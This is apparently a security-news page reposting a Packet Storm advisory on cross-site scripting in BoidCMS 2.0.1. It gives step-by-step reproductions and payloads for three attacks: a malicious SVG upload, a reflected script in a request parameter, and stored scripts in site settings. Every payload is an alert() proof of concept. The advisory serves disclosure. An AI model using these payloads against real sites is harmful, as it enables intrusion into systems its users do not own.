Security
Headlines
HeadlinesLatestCVEs

Headline

BoidCMS 2.0.1 Cross Site Scripting

BoidCMS version 2.0.1 suffers from multiple cross site scripting vulnerabilities. Original discovery of cross site scripting in this version is attributed to Rahad Chowdhury in December of 2023, though this advisory provides additional vectors of attack.

Packet Storm
#xss#vulnerability#ubuntu#java#auth
# Exploit Title: Multiple XSS Issues in boidcmsv2.0.1# Date: 3/2024# Exploit Author: Andrey Stoykov# Version: 2.0.1# Tested on: Ubuntu 22.04# Blog: http://msecureltd.blogspot.comXSS via SVG File UploadSteps to Reproduce:1. Login with admin user2. Visit "Media" page3. Upload xss.svg4. Click "View" and XSS payload will execute// xss.svg contents<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"stroke="#004400"/>   <script type="text/javascript">      alert(`XSS`);   </script></svg>Reflected XSS:Steps to Reproduce:1. Login as admin2. Visit "Media" page3. Click "Delete" and intercept the HTTP GET request4. In "file" parameter add the payload "<script>alert(1)</script>"5. After forwarding the HTTP GET request a browser popup would surfaceStored XSS:Steps to Reproduce:1. Login as admin2. Visit "Settings" page3. Enter XSS payload in "Title", "Subtitle", "Footer"4. Then visit the blog page

Packet Storm: Latest News

Ubuntu Security Notice USN-7121-3